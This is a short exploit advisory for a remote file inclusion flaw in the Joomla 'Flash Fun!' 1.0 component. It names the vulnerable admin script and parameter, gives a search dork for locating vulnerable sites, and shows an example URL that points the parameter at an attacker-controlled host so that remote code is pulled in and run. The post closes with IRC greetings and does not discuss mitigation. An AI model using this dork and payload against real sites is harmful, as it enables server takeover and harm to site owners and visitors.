id: 2143
date: 09/14/2007
title: Joomla Component Flash Fun! 1.0 Remote File Inclusion Vulnerability
author: Morgan
cves: 

===================================================================
Joomla Component Flash Fun! 1.0 Remote File Inclusion Vulnerability
===================================================================


######################################
# Joomla Flash Fun! Component RFI    #
######################################

Bug in :
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
Variable : $mosConfig_live_site

Dork: "com_joomlaflashfun"

Example:

http://xxx.net/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=[attacker]


Greets to all Irc.RealWorm.Net #Morgan Users ;)



#  0day.today [2023-03-23]  #